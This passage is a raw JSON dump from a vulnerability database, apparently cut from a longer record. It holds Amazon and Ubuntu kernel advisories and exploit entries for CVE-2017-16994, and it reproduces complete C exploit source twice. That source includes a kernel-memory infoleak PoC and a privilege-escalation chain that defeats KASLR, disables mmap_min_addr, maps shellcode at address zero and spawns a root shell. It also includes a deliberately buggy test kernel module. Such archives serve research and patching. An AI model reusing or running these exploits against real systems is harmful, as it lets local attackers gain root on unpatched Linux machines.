([CVE-2017-16650 __](<https://access.redhat.com/security/cve/CVE-2017-16650>))\n\nThe usbnet_generic_cdc_bind function in drivers/net/usb/cdc_ether.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16649 __](<https://access.redhat.com/security/cve/CVE-2017-16649>))\n\nA vulnerability was found in the Linux kernel when peeling off an association to the socket in another network namespace. All transports in this association are not to be rehashed and keep using the old key in hashtable, thus removing transports from hashtable when closing the socket, all transports are being freed. Later on a use-after-free issue could be caused when looking up an association and dereferencing the transports. ([CVE-2017-15115 __](<https://access.redhat.com/security/cve/CVE-2017-15115>))\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n perf-4.9.70-22.55.amzn1.i686 \n kernel-4.9.70-22.55.amzn1.i686 \n kernel-debuginfo-common-i686-4.9.70-22.55.amzn1.i686 \n kernel-debuginfo-4.9.70-22.55.amzn1.i686 \n perf-debuginfo-4.9.70-22.55.amzn1.i686 \n kernel-tools-devel-4.9.70-22.55.amzn1.i686 \n kernel-headers-4.9.70-22.55.amzn1.i686 \n kernel-tools-4.9.70-22.55.amzn1.i686 \n kernel-devel-4.9.70-22.55.amzn1.i686 \n kernel-tools-debuginfo-4.9.70-22.55.amzn1.i686 \n \n noarch: \n kernel-doc-4.9.70-22.55.amzn1.noarch \n \n src: \n kernel-4.9.70-22.55.amzn1.src \n \n x86_64: \n kernel-tools-4.9.70-22.55.amzn1.x86_64 \n kernel-devel-4.9.70-22.55.amzn1.x86_64 \n kernel-headers-4.9.70-22.55.amzn1.x86_64 \n kernel-4.9.70-22.55.amzn1.x86_64 \n perf-4.9.70-22.55.amzn1.x86_64 \n kernel-tools-devel-4.9.70-22.55.amzn1.x86_64 \n kernel-tools-debuginfo-4.9.70-22.55.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.9.70-22.55.amzn1.x86_64 \n perf-debuginfo-4.9.70-22.55.amzn1.x86_64 \n kernel-debuginfo-4.9.70-22.55.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2017-12-21T00:02:00", "published": "2017-12-21T00:02:00", "id": "ALAS-2017-937", "href": "https://alas.aws.amazon.com/ALAS-2017-937.html", "title": "Important: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-04T21:28:34", "description": "Exploit for linux platform in category dos / poc", "edition": 1, "published": "2018-03-20T00:00:00", "type": "zdt", "title": "Linux Kernel - mincore() Heap Page Disclosure (PoC) Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16994"], "modified": "2018-03-20T00:00:00", "href": "https://0day.today/exploit/description/30016", "id": "1337DAY-ID-30016", "sourceData": "/*\r\n * The source is modified from \r\n * https://bugs.chromium.org/p/project-zero/issues/detail?id=1431\r\n * I try to find out infomation useful from the infoleak\r\n * The kernel address can be easily found out from the 
uninitialized memory\r\n * leaked from kernel, which can help bypass kaslr\r\n */\r\n \r\n#define _GNU_SOURCE\r\n#include <unistd.h>\r\n#include <sys/mman.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n \r\nint main(void) {\r\n unsigned char buf[getpagesize()/sizeof(unsigned char)];\r\n int right = 1;\r\n unsigned long addr = 0;\r\n \r\n /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */\r\n if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED)\r\n err(1, \"mmap\");\r\n \r\n while(right){\r\n /* Touch a mishandle with this type mapping */\r\n if (mincore((void*)0x86000000, 0x1000000, buf))\r\n perror(\"mincore\");\r\n for( int n=0; n<getpagesize()/sizeof(unsigned char); n++) {\r\n addr = *(unsigned long*)(&buf[n]);\r\n /* Kernel address space, may need some mask&offset */\r\n if(addr > 0xffffffff00000000){\r\n right = 0;\r\n goto out;\r\n }\r\n }\r\n }\r\n out:\r\n printf(\"%p\\n\", addr);\r\n return 0;\r\n}\n\n# 0day.today [2018-04-04] #", "sourceHref": "https://0day.today/exploit/30016", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-04T19:33:01", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2018-03-20T00:00:00", "title": "Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16994"], "modified": "2018-03-20T00:00:00", "href": "https://0day.today/exploit/description/30015", "id": "1337DAY-ID-30015", "sourceData": "/** disable_map_min_add.c **/\r\n/*\r\n *\r\n */\r\n \r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <sys/resource.h>\r\n#include <syscall.h>\r\n \r\n/* offsets might differ, kernel was custom compiled\r\n * you can read vmlinux and caculate the offset when testing\r\n */\r\n \r\n/*\r\n#define 
OFFSET_KERNEL_BASE 0x000000\r\n */\r\n#define MMAP_MIN_ADDR 0x1101de8\r\n#define DAC_MMAP_MIN_ADDR 0xe8e810\r\n \r\n/* get kernel functions address by reading /proc/kallsyms */\r\nunsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[256];\r\n int ret = 0;\r\n \r\n f = fopen(\"/proc/kallsyms\", \"r\");\r\n if (f == NULL) {\r\n printf(\"[-] Failed to open /proc/kallsyms\\n\");\r\n exit(-1);\r\n }\r\n printf(\"[+] Find %s...\\n\", name);\r\n while(ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fclose(f);\r\n printf(\"[+] Found %s at %lx\\n\", name, addr);\r\n return addr;\r\n }\r\n }\r\n fclose(f);\r\n return 0;\r\n}\r\n \r\nint main(void)\r\n{\r\n int pid, pid2, pid3;\r\n struct rusage rusage = { };\r\n unsigned long *p, *kernel_base;\r\n char *mmap_min_addr, *dac_mmap_min_addr;\r\n pid = fork();\r\n if (pid > 0) {\r\n /* try to bypass kaslr when /proc/kallsyms isn't readable */\r\n syscall(__NR_waitid, P_PID, pid, NULL, WEXITED|WNOHANG|__WNOTHREAD, &rusage);\r\n printf(\"[+] Leak size=%d bytes\\n\", sizeof(rusage));\r\n for (p = (unsigned long *)&rusage;\r\n p < (unsigned long *)((char *)&rusage + sizeof(rusage));\r\n p++) {\r\n printf(\"[+] Leak point: %p\\n\", p);\r\n if (*p > 0xffffffff00000000 && *p < 0xffffffffff000000) {\r\n p = (unsigned long *)(*p&0xffffffffff000000 /*+ OFFSET_TO_BASE*/); // spender's wouldn't actually work when KASLR was enabled\r\n break;\r\n }\r\n }\r\n if(p < (unsigned long *)0xffffffff00000000 || p > (unsigned long *)0xffffffffff000000)\r\n exit(-1);\r\n } else if (pid == 0) {\r\n sleep(1);\r\n exit(0);\r\n }\r\n \r\n kernel_base = get_kernel_sym(\"startup_64\");\r\n printf(\"[+] Got kernel base: %p\\n\", kernel_base);\r\n mmap_min_addr = (char *)kernel_base + MMAP_MIN_ADDR;\r\n printf(\"[+] Got mmap_min_addr: %p\\n\", 
mmap_min_addr);\r\n dac_mmap_min_addr = (char *)kernel_base + DAC_MMAP_MIN_ADDR;\r\n printf(\"[+] Got dac_mmap_min_addr: %p\\n\", dac_mmap_min_addr);\r\n \r\n pid2 = fork();\r\n if (pid2 > 0) {\r\n printf(\"[+] Overwriting map_min_addr...\\n\");\r\n if (syscall(__NR_waitid, P_PID, pid, (siginfo_t *)(mmap_min_addr - 2), WEXITED|WNOHANG|__WNOTHREAD, NULL) < 0) {\r\n printf(\"[-] Failed!\\n\");\r\n exit(1);\r\n }\r\n } else if (pid2 == 0) {\r\n sleep(1);\r\n exit(0);\r\n }\r\n \r\n pid3 = fork();\r\n if (pid3 > 0) {\r\n printf(\"[+] Overwriting dac_mmap_min_addr...\\n\");\r\n if (syscall(__NR_waitid, P_PID, pid, (siginfo_t *)(dac_mmap_min_addr - 2), WEXITED|WNOHANG|__WNOTHREAD, NULL) < 0) {\r\n printf(\"[-] Failed!\\n\");\r\n exit(1);\r\n }\r\n printf(\"[+] map_min_addr disabled!\\n\");\r\n exit(0);\r\n } else if (pid3 == 0) {\r\n sleep(1);\r\n exit(0);\r\n }\r\n return 0;\r\n}\r\n/** disable_map_min_add.c EOF **/\r\n \r\n/** null_poiter_exploit.c **/\r\n \r\n#define _GNU_SOURCE\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/mman.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n \r\nstruct cred;\r\nstruct task_struct;\r\n \r\ntypedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3)));\r\ntypedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3)));\r\n \r\nprepare_kernel_cred_t prepare_kernel_cred;\r\ncommit_creds_t commit_creds;\r\n \r\n/* a kernel null pointer derefence will help get privilege\r\n * /proc/test is a kernel-load module create for testing\r\n * touch_null_kp can be replace your own implement to\r\n * touch a kernel null ponit\r\n */\r\nvoid touch_null_kp() {\r\n printf(\"[+]Start touch kernel null point\\n\");\r\n \r\n int *f = open(\"/proc/test\", O_RDONLY);\r\n read(f, NULL, 0);\r\n}\r\n \r\n/* run shell after root */\r\nvoid get_shell() {\r\n char 
*argv[] = {\"/bin/sh\", NULL};\r\n \r\n if (getuid() == 0){\r\n printf(\"[+] Root shell success !! :)\\n\");\r\n execve(\"/bin/sh\", argv, NULL);\r\n }\r\n printf(\"[-] failed to get root shell :(\\n\");\r\n}\r\n \r\n/* use for privilige escalation */\r\nvoid get_root() {\r\n commit_creds(prepare_kernel_cred(0));\r\n}\r\n \r\n/* get function address by reading /proc/kallsyms */\r\nunsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[256];\r\n int ret = 0;\r\n \r\n f = fopen(\"/proc/kallsyms\", \"r\");\r\n if (f == NULL) {\r\n printf(\"[-] Failed to open /proc/kallsyms\\n\");\r\n exit(-1);\r\n }\r\n printf(\"[+] Find %s...\\n\", name);\r\n while(ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fclose(f);\r\n printf(\"[+] Found %s at %lx\\n\", name, addr);\r\n return addr;\r\n }\r\n }\r\n fclose(f);\r\n return 0;\r\n}\r\n \r\nint main(int ac, char **av)\r\n{\r\n \r\n /* get function address */\r\n prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym(\"prepare_kernel_cred\");\r\n commit_creds = (commit_creds_t)get_kernel_sym(\"commit_creds\");\r\n printf(\"Got commit_creds:%p,prepare_kernel_cred%p\\n\", commit_creds, prepare_kernel_cred);\r\n \r\n /* allocate memory loacate in 0x00 */\r\n printf(\"[+] Try to allocat 0x00000000...\\n\");\r\n if (mmap(0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_ANON|MAP_PRIVATE|MAP_FIXED, -1, 0) == (char *)-1){\r\n printf(\"[-] Failed to allocat 0x00000000\\n\");\r\n return -1;\r\n }\r\n printf(\"[+] Allocation success !\\n\");\r\n /* memset(0, 0xcc, 4096); */\r\n /*\r\n //movq rax, 0xffffffff81f3f45a\r\n //movq [rax], 0\r\n // it is not nessecc\r\n mov rax, 0x4242424242424242\r\n call rax\r\n xor rax, rax\r\n ret\r\n replace 0x4242424242424242 by get_root\r\n https://defuse.ca/online-x86-assembler.htm#disassembly\r\n */\r\n \r\n 
unsigned char shellcode[] = \r\n { /*0x48, 0xC7, 0xC0, 0x5A, 0xF4, 0xF3, 0x81, *//*0x48, 0xC7, 0x00, 0x00, 0x00, 0x00, 0x00,*/ 0x48, 0xB8, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0xFF, 0xD0, 0x48, 0x31, 0xC0, 0xC3 };\r\n /* insert the getroot address to shellcode */\r\n void **get_root_offset = rawmemchr(shellcode, 0x42);\r\n (*get_root_offset) = get_root;\r\n /* map shellcode to 0x00 */\r\n memcpy(0, shellcode, sizeof(shellcode));\r\n \r\n /* jmp to 0x00 */\r\n touch_null_kp();\r\n \r\n get_shell();\r\n \r\n}\r\n \r\n/** null_poiter_exploit.c EOF **/\r\n \r\n/** test.c **/\r\n#include <linux/init.h>\r\n#include <linux/module.h>\r\n#include <linux/proc_fs.h>\r\n#include <linux/uaccess.h>\r\n#include <linux/slab.h>\r\n#include <asm/ptrace.h>\r\n#include <asm/thread_info.h>\r\n \r\n#define MY_DEV_NAME \"test\"\r\n#define DEBUG_FLAG \"PROC_DEV\"\r\n \r\nextern unsigned long proc_test_sp_print;\r\nstatic ssize_t proc_read (struct file *proc_file, char __user *proc_user, size_t n, loff_t *loff);\r\nstatic ssize_t proc_write (struct file *proc_file, const char __user *proc_user, size_t n, loff_t *loff);\r\nstatic int proc_open (struct inode *proc_inode, struct file *proc_file);\r\nstatic struct file_operations a = {\r\n .open = proc_open,\r\n .read = proc_read,\r\n .write = proc_write,\r\n};\r\n \r\n \r\nstatic int __init mod_init(void)\r\n{\r\n struct proc_dir_entry *test_entry;\r\n const struct file_operations *proc_fops = &a;\r\n printk(DEBUG_FLAG\":proc init start\\n\");\r\n \r\n test_entry = proc_create(MY_DEV_NAME, S_IRUGO|S_IWUGO, NULL, proc_fops);\r\n if(!test_entry)\r\n printk(DEBUG_FLAG\":there is somethings wrong!\\n\");\r\n \r\n printk(DEBUG_FLAG\":proc init over!\\n\");\r\n return 0;\r\n}\r\n \r\nstatic ssize_t proc_read (struct file *proc_file, char *proc_user, size_t n, loff_t *loff)\r\n{\r\n void (*fun)(void);\r\n fun = NULL;\r\n //printk(\"%s:thread.sp0: %p, task->stack: %p\\n\", \"PROC\", current->thread.sp0, current->stack);\r\n fun();\r\n 
//printk(\"The memory of %p : %d\\n\", proc_user, *proc_user);\r\n return 0;\r\n}\r\n \r\nstatic ssize_t proc_write (struct file *proc_file, const char __user *proc_user, size_t n, loff_t *loff)\r\n{\r\n printk(\"%s:thread.sp0: %p, task->stack: %p\\n\", \"PROC\", current->thread.sp0, current->stack);\r\n return 0;\r\n}\r\n \r\nint proc_open (struct inode *proc_inode, struct file *proc_file)\r\n{\r\n printk(DEBUG_FLAG\":into open, cmdline:%s!\\n\", current->comm);\r\n printk(\"%s:thread.sp0: %p, task->stack: %p\\n\", \"PROC\", current->thread.sp0, current->stack);\r\n return 0;\r\n}\r\n \r\nmodule_init(mod_init);\r\n/** test.c EOF **/\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/30015"}], "exploitdb": [{"lastseen": "2018-05-24T14:08:22", "description": "Linux Kernel - 'mincore()' Heap Page Disclosure (PoC). CVE-2017-16994. Dos exploit for Linux platform", "published": "2017-12-11T00:00:00", "type": "exploitdb", "title": "Linux Kernel - 'mincore()' Heap Page Disclosure (PoC)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16994"], "modified": "2017-12-11T00:00:00", "id": "EDB-ID:44304", "href": "https://www.exploit-db.com/exploits/44304/", "sourceData": "/*\r\n * The source is modified from \r\n * https://bugs.chromium.org/p/project-zero/issues/detail?id=1431\r\n * I try to find out infomation useful from the infoleak\r\n * The kernel address can be easily found out from the uninitialized memory\r\n * leaked from kernel, which can help bypass kaslr\r\n */\r\n\r\n#define _GNU_SOURCE\r\n#include <unistd.h>\r\n#include <sys/mman.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n\r\nint main(void) {\r\n unsigned char buf[getpagesize()/sizeof(unsigned char)];\r\n int right = 1;\r\n unsigned long addr = 0;\r\n \r\n /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */\r\n if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB 
| MAP_NORESERVE, -1, 0) == MAP_FAILED)\r\n err(1, \"mmap\");\r\n\r\n while(right){\r\n /* Touch a mishandle with this type mapping */\r\n if (mincore((void*)0x86000000, 0x1000000, buf))\r\n perror(\"mincore\");\r\n for( int n=0; n<getpagesize()/sizeof(unsigned char); n++) {\r\n addr = *(unsigned long*)(&buf[n]);\r\n /* Kernel address space, may need some mask&offset */\r\n if(addr > 0xffffffff00000000){\r\n\tright = 0;\r\n\tgoto out;\r\n }\r\n }\r\n }\r\n out:\r\n printf(\"%p\\n\", addr);\r\n return 0;\r\n}", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/44304/"}, {"lastseen": "2018-05-24T14:08:19", "description": "Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation. CVE-2017-16994. Local exploit for Linux platform", "published": "2017-12-11T00:00:00", "type": "exploitdb", "title": "Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5123", "CVE-2017-16994"], "modified": "2017-12-11T00:00:00", "id": "EDB-ID:44303", "href": "https://www.exploit-db.com/exploits/44303/", "sourceData": "/** disable_map_min_add.c **/\r\n/*\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <sys/resource.h>\r\n#include <syscall.h>\r\n\r\n/* offsets might differ, kernel was custom compiled\r\n * you can read vmlinux and caculate the offset when testing\r\n */\r\n\r\n/*\r\n#define OFFSET_KERNEL_BASE 0x000000\r\n */\r\n#define MMAP_MIN_ADDR 0x1101de8\r\n#define DAC_MMAP_MIN_ADDR 0xe8e810\r\n\r\n/* get kernel functions address by reading /proc/kallsyms */\r\nunsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[256];\r\n int ret = 0;\r\n\r\n f = fopen(\"/proc/kallsyms\", \"r\");\r\n if (f == NULL) {\r\n printf(\"[-] Failed to open /proc/kallsyms\\n\");\r\n exit(-1);\r\n }\r\n 
printf(\"[+] Find %s...\\n\", name);\r\n while(ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fclose(f);\r\n printf(\"[+] Found %s at %lx\\n\", name, addr);\r\n return addr;\r\n }\r\n }\r\n fclose(f);\r\n return 0;\r\n}\r\n\r\nint main(void)\r\n{\r\n int pid, pid2, pid3;\r\n struct rusage rusage = { };\r\n unsigned long *p, *kernel_base;\r\n char *mmap_min_addr, *dac_mmap_min_addr;\r\n pid = fork();\r\n if (pid > 0) {\r\n /* try to bypass kaslr when /proc/kallsyms isn't readable */\r\n syscall(__NR_waitid, P_PID, pid, NULL, WEXITED|WNOHANG|__WNOTHREAD, &rusage);\r\n printf(\"[+] Leak size=%d bytes\\n\", sizeof(rusage));\r\n for (p = (unsigned long *)&rusage;\r\n\t p < (unsigned long *)((char *)&rusage + sizeof(rusage));\r\n\t p++) {\r\n printf(\"[+] Leak point: %p\\n\", p);\r\n if (*p > 0xffffffff00000000 && *p < 0xffffffffff000000) {\r\n\tp = (unsigned long *)(*p&0xffffffffff000000 /*+ OFFSET_TO_BASE*/); // spender's wouldn't actually work when KASLR was enabled\r\n\tbreak;\r\n }\r\n }\r\n if(p < (unsigned long *)0xffffffff00000000 || p > (unsigned long *)0xffffffffff000000)\r\n exit(-1);\r\n } else if (pid == 0) {\r\n sleep(1);\r\n exit(0);\r\n }\r\n\r\n kernel_base = get_kernel_sym(\"startup_64\");\r\n printf(\"[+] Got kernel base: %p\\n\", kernel_base);\r\n mmap_min_addr = (char *)kernel_base + MMAP_MIN_ADDR;\r\n printf(\"[+] Got mmap_min_addr: %p\\n\", mmap_min_addr);\r\n dac_mmap_min_addr = (char *)kernel_base + DAC_MMAP_MIN_ADDR;\r\n printf(\"[+] Got dac_mmap_min_addr: %p\\n\", dac_mmap_min_addr);\r\n \r\n pid2 = fork();\r\n if (pid2 > 0) {\r\n printf(\"[+] Overwriting map_min_addr...\\n\");\r\n if (syscall(__NR_waitid, P_PID, pid, (siginfo_t *)(mmap_min_addr - 2), WEXITED|WNOHANG|__WNOTHREAD, NULL) < 0) {\r\n printf(\"[-] Failed!\\n\");\r\n exit(1);\r\n }\r\n } else if (pid2 == 0) {\r\n sleep(1);\r\n exit(0);\r\n 
}\r\n \r\n pid3 = fork();\r\n if (pid3 > 0) {\r\n printf(\"[+] Overwriting dac_mmap_min_addr...\\n\");\r\n if (syscall(__NR_waitid, P_PID, pid, (siginfo_t *)(dac_mmap_min_addr - 2), WEXITED|WNOHANG|__WNOTHREAD, NULL) < 0) {\r\n printf(\"[-] Failed!\\n\");\r\n exit(1);\r\n }\r\n printf(\"[+] map_min_addr disabled!\\n\");\r\n exit(0);\r\n } else if (pid3 == 0) {\r\n sleep(1);\r\n exit(0);\r\n }\r\n return 0;\r\n}\r\n/** disable_map_min_add.c EOF **/\r\n\r\n/** null_poiter_exploit.c **/\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/mman.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n\r\nstruct cred;\r\nstruct task_struct;\r\n\r\ntypedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3)));\r\ntypedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3)));\r\n\r\nprepare_kernel_cred_t prepare_kernel_cred;\r\ncommit_creds_t commit_creds;\r\n\r\n/* a kernel null pointer derefence will help get privilege\r\n * /proc/test is a kernel-load module create for testing\r\n * touch_null_kp can be replace your own implement to\r\n * touch a kernel null ponit\r\n */\r\nvoid touch_null_kp() {\r\n printf(\"[+]Start touch kernel null point\\n\");\r\n\r\n int *f = open(\"/proc/test\", O_RDONLY);\r\n read(f, NULL, 0);\r\n}\r\n\r\n/* run shell after root */\r\nvoid get_shell() {\r\n char *argv[] = {\"/bin/sh\", NULL};\r\n\r\n if (getuid() == 0){\r\n printf(\"[+] Root shell success !! 
:)\\n\");\r\n execve(\"/bin/sh\", argv, NULL);\r\n }\r\n printf(\"[-] failed to get root shell :(\\n\");\r\n}\r\n\r\n/* use for privilige escalation */\r\nvoid get_root() {\r\n commit_creds(prepare_kernel_cred(0));\r\n}\r\n\r\n/* get function address by reading /proc/kallsyms */\r\nunsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[256];\r\n int ret = 0;\r\n\r\n f = fopen(\"/proc/kallsyms\", \"r\");\r\n if (f == NULL) {\r\n printf(\"[-] Failed to open /proc/kallsyms\\n\");\r\n exit(-1);\r\n }\r\n printf(\"[+] Find %s...\\n\", name);\r\n while(ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fclose(f);\r\n printf(\"[+] Found %s at %lx\\n\", name, addr);\r\n return addr;\r\n }\r\n }\r\n fclose(f);\r\n return 0;\r\n}\r\n\r\nint main(int ac, char **av)\r\n{\r\n\r\n /* get function address */\r\n prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym(\"prepare_kernel_cred\");\r\n commit_creds = (commit_creds_t)get_kernel_sym(\"commit_creds\");\r\n printf(\"Got commit_creds:%p,prepare_kernel_cred%p\\n\", commit_creds, prepare_kernel_cred);\r\n\r\n /* allocate memory loacate in 0x00 */\r\n printf(\"[+] Try to allocat 0x00000000...\\n\");\r\n if (mmap(0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_ANON|MAP_PRIVATE|MAP_FIXED, -1, 0) == (char *)-1){\r\n printf(\"[-] Failed to allocat 0x00000000\\n\");\r\n return -1;\r\n }\r\n printf(\"[+] Allocation success !\\n\");\r\n /* memset(0, 0xcc, 4096); */\r\n /*\r\n //movq rax, 0xffffffff81f3f45a\r\n //movq [rax], 0\r\n // it is not nessecc\r\n mov rax, 0x4242424242424242\r\n call rax\r\n xor rax, rax\r\n ret\r\n replace 0x4242424242424242 by get_root\r\n https://defuse.ca/online-x86-assembler.htm#disassembly\r\n */\r\n\r\n unsigned char shellcode[] = \r\n { /*0x48, 0xC7, 0xC0, 0x5A, 0xF4, 0xF3, 0x81, *//*0x48, 0xC7, 0x00, 
0x00, 0x00, 0x00, 0x00,*/ 0x48, 0xB8, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0xFF, 0xD0, 0x48, 0x31, 0xC0, 0xC3 };\r\n /* insert the getroot address to shellcode */\r\n void **get_root_offset = rawmemchr(shellcode, 0x42);\r\n (*get_root_offset) = get_root;\r\n /* map shellcode to 0x00 */\r\n memcpy(0, shellcode, sizeof(shellcode));\r\n\r\n /* jmp to 0x00 */\r\n touch_null_kp();\r\n\r\n get_shell();\r\n\r\n}\r\n\r\n/** null_poiter_exploit.c EOF **/\r\n\r\n/** test.c **/\r\n#include <linux/init.h>\r\n#include <linux/module.h>\r\n#include <linux/proc_fs.h>\r\n#include <linux/uaccess.h>\r\n#include <linux/slab.h>\r\n#include <asm/ptrace.h>\r\n#include <asm/thread_info.h>\r\n\r\n#define MY_DEV_NAME \"test\"\r\n#define DEBUG_FLAG \"PROC_DEV\"\r\n\r\nextern unsigned long proc_test_sp_print;\r\nstatic ssize_t proc_read (struct file *proc_file, char __user *proc_user, size_t n, loff_t *loff);\r\nstatic ssize_t proc_write (struct file *proc_file, const char __user *proc_user, size_t n, loff_t *loff);\r\nstatic int proc_open (struct inode *proc_inode, struct file *proc_file);\r\nstatic struct file_operations a = {\r\n .open = proc_open,\r\n .read = proc_read,\r\n .write = proc_write,\r\n};\r\n\r\n\r\nstatic int __init mod_init(void)\r\n{\r\n struct proc_dir_entry *test_entry;\r\n const struct file_operations *proc_fops = &a;\r\n printk(DEBUG_FLAG\":proc init start\\n\");\r\n\r\n test_entry = proc_create(MY_DEV_NAME, S_IRUGO|S_IWUGO, NULL, proc_fops);\r\n if(!test_entry)\r\n printk(DEBUG_FLAG\":there is somethings wrong!\\n\");\r\n\r\n printk(DEBUG_FLAG\":proc init over!\\n\");\r\n return 0;\r\n}\r\n\r\nstatic ssize_t proc_read (struct file *proc_file, char *proc_user, size_t n, loff_t *loff)\r\n{\r\n void (*fun)(void);\r\n fun = NULL;\r\n //printk(\"%s:thread.sp0: %p, task->stack: %p\\n\", \"PROC\", current->thread.sp0, current->stack);\r\n fun();\r\n //printk(\"The memory of %p : %d\\n\", proc_user, *proc_user);\r\n return 0;\r\n}\r\n\r\nstatic ssize_t proc_write 
(struct file *proc_file, const char __user *proc_user, size_t n, loff_t *loff)\r\n{\r\n printk(\"%s:thread.sp0: %p, task->stack: %p\\n\", \"PROC\", current->thread.sp0, current->stack);\r\n return 0;\r\n}\r\n\r\nint proc_open (struct inode *proc_inode, struct file *proc_file)\r\n{\r\n printk(DEBUG_FLAG\":into open, cmdline:%s!\\n\", current->comm);\r\n printk(\"%s:thread.sp0: %p, task->stack: %p\\n\", \"PROC\", current->thread.sp0, current->stack);\r\n return 0;\r\n}\r\n\r\nmodule_init(mod_init);\r\n/** test.c EOF **/", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/44303/"}], "ubuntu": [{"lastseen": "2020-07-09T00:23:05", "bulletinFamily": "unix", "cvelist": ["CVE-2017-17450", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-0861", "CVE-2017-17805", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16645", "CVE-2017-17806"], "description": "It was discovered that a race condition leading to a use-after-free \nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that a use-after-free vulnerability existed in the \nnetwork namespaces implementation in the Linux kernel. A local attacker \ncould use this to cause a denial of service (system crash) or possibly \nexecute arbitrary code. (CVE-2017-15129)\n\nAndrey Konovalov discovered that the usbtest device driver in the Linux \nkernel did not properly validate endpoint metadata. A physically proximate \nattacker could use this to cause a denial of service (system crash). 
